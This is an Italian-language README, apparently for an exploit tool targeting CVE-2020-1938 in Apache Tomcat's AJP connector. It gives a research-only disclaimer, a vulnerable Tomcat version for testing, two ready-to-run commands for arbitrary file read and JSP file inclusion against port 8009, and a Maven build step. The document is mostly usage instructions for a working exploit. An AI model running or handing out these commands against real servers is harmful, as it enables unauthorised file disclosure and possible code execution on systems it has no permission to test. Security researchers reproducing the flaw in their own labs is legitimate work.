
CVE-2020-1938
Lo strumento è solo per ricerca sulla sicurezza e auto-test interni. È vietato utilizzare lo strumento per attacchi illegali. L'utente è responsabile per eventuali conseguenze.

apache-tomcat-8.5.32.zip per testare Tomcat
Lettura arbitraria di file
java -jar 1.jar com.threedr3am.bug.tomcat.ajp.FileRead 127.0.0.1 8009 file /index.jsp
Inclusione di file
java -jar 1.jar com.threedr3am.bug.tomcat.ajp.FileRead 127.0.0.1 8009 jsp /index.jsp
Metodo di packaging: Nella directory tomcat/ajp-bug eseguire mvn clean compile assembly:assembly